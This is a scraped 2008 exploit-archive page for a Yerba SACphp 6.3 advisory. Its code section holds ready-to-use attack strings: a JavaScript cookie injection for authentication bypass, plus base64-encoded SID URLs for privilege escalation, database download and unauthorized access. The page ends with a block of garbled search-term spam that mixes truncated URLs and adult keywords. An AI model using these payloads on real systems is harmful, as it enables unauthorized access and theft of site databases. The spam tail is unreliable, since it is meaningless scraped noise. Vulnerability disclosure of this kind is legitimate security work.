about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Yerba SACphp 6.3 Multliple Remote Vulnerabilities


Title Yerba SACphp 6.3 Multliple Remote Vulnerabilities
Published 2008-10-07-12:00AM
Updated 2008-10-07-08:58PM
Class Unknown
CVE  
Remote  Yes
Local  No
Credit  StAkeR
Vulnerable  Yerba SACphp 6.3
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example URIs and JavaScript are available: Authentication bypass:
javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="Privilege-escalation
http://www.example.com/index.php?SID=[path (base64 encoded)]Database Download
http://www.example.com/index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==Unauthorized access:
http://www.example.com/index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 10:30:16 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
SSH-1.99-O www.sexvei port 5190 news for c WWW.netixi Asian sexy Karina kap maxcpm.inf Www. Sexma %20boo hot sania www.worald Internet.S elvideopor Fukinggirl reshmasexv IIS/Window mula news+for+C sextv1.tv www.tamil Darwin proeski News Searc www.gzyunl wedding ni maxcpm.inf /search/ex CRE b o o b s frogsex.co lo816l cat+%252Fi openssh 3. gg.sh1988. news/explo www.davidc 200 /compo www.yzzdzs sex free Www+Galeri news for c www.jisucl news for c www.k089.c maxcpm.inf www.bjmsgg rtrt maxcpm.inf upboard re